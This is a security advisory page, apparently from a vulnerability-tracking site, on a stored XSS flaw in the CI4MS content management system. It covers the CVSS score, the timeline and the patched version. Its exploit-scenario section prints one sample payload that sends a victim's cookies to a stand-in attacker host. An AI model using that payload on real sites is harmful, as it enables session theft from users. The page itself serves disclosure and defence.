What is the CVSS score of CVE-2026-34561?

CVE-2026-34561 has a CVSS 3.1 base score of 4.7 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L. EPSS exploitation probability: 0.0%.

Is there a patch available for CVE-2026-34561?

Yes, a patch is available for CVE-2026-34561. Update the affected software to the latest version immediately.

Ci4ms CVE-2026-34561

EUVD-2026-18073 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-04-01 GitHub_M

GHSA-gcfj-cf7j-vwgj

XSS Ci4ms

4.7

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

4.7 MEDIUM

AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Attack Vector

Network

Attack Complexity

Low

Privileges Required

High

User Interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

Low

Availability

Low

Lifecycle Timeline

Patch released

Apr 02, 2026 - 02:30 nvd

Patch available

EUVD ID Assigned

Apr 01, 2026 - 22:16 euvd

EUVD-2026-18073

Analysis Generated

Apr 01, 2026 - 22:16 vuln.today

CVE Published

Apr 01, 2026 - 21:23 nvd

MEDIUM 4.7

DescriptionGitHub Advisory

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings - Social Media Management. Multiple configuration fields, including Social Media and Social Media Link, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.

AnalysisAI

Stored cross-site scripting (XSS) in CI4MS prior to version 0.31.0.0 allows authenticated high-privilege administrators to inject malicious scripts through unvalidated System Settings - Social Media Management configuration fields. The vulnerability stores attacker-controlled input server-side and renders it without proper output encoding, enabling script execution in the context of the application. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	The CVSS v3.1 score of 4.7 reflects a network-accessible vulnerability with low attack complexity but high privilege requirement (PR:H), resulting in low confidentiality, integrity, and availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An authenticated administrator with high-privilege credentials (PR:H) accesses the CI4MS System Settings panel and navigates to the Social Media Management section. Rather than entering legitimate social media account names or URLs, the administrator intentionally inputs a malicious script payload, such as <img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)"> in the Social Media field. …
Remediation	Vendor-released patch: CI4MS version 0.31.0.0 or later. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-34561 vulnerability details – vuln.today

Back